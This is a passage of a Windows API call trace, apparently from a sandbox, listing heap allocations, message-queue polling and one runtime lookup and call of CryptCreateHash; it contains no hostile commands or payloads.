[0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0121.081] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0121.081] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0121.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.081] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.081] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.082] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.082] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.082] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.083] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0121.083] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0121.083] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.083] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.083] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.083] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.083] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.084] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.084] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.085] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.085] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x14bdb50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0121.085] GetProcAddress (hModule=0x77820000, lpProcName="CryptCreateHash") returned 0x7783fa00 [0121.085] CryptCreateHash (in: hProv=0x148ef18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x7df280 | out: phHash=0x7df280) returned 1 [0121.086] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x133c9b8 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaf0 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda48 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc88 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc88 | out: hHeap=0x12c0000) returned 1 [0121.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda48 | out: hHeap=0x12c0000) returned 1 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbb0 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb20 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda48 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0121.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda48 | out: hHeap=0x12c0000) returned 1 [0121.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.087] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb20 | out: hHeap=0x12c0000) returned 1 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdac0 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb38 [0121.087] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc88 [0121.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc88 | out: hHeap=0x12c0000) returned 1 [0121.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb38 | out: hHeap=0x12c0000) returned 1 [0121.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdcb8 [0121.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda90 [0121.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb68 [0121.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb68 | out: hHeap=0x12c0000) returned 1 [0121.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda90 | out: hHeap=0x12c0000) returned 1 [0121.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc70 [0121.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda18 [0121.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda48 [0121.088] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda48 | out: hHeap=0x12c0000) returned 1 [0121.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.088] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda18 | out: hHeap=0x12c0000) returned 1 [0121.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdaa8 [0121.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9d0 [0121.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbc8 [0121.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbc8 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9d0 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff000 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda30 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.089] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0121.090] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb98 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd718 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda00 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc28 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a35c8 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd778 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c448 | out: hHeap=0x12c0000) returned 1 [0121.091] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0121.091] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.092] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1b8 [0121.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9b8 [0121.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0121.092] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0121.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300dc8 [0121.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9b8 [0121.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0121.092] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0121.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd718 [0121.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.093] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.093] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0121.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0121.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0121.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.093] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.093] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.093] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491978 [0121.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0121.093] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.094] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.094] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0121.094] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.094] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0121.094] RtlAllocateHeap 